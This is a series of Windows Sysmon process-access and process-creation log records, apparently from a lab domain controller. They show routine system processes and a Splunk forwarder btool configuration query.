{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109F0C0500}\r\nTargetProcessId: 5064\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109F0C0500}","TargetProcessId":"5064","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.252\r\nProcessGuid: {A837DB8D-0238-5F25-0000-00105B0D0500}\r\nProcessId: 5056\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0238-5F25-0000-00109F0C0500}\r\nParentProcessId: 5064\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.252","ProcessGuid":"{A837DB8D-0238-5F25-0000-00105B0D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0238-5F25-0000-00109F0C0500}","ParentProcessId":"5064","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServer --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-0238-5F25-0000-00109F0C0500}\r\nSourceProcessId: 5064\r\nSourceThreadId: 5060\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00105B0D0500}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-0238-5F25-0000-00109F0C0500}","SourceProcessId":"5064","SourceThreadId":"5060","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00105B0D0500}","TargetProcessId":"5056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00105B0D0500}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00105B0D0500}","TargetProcessId":"5056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
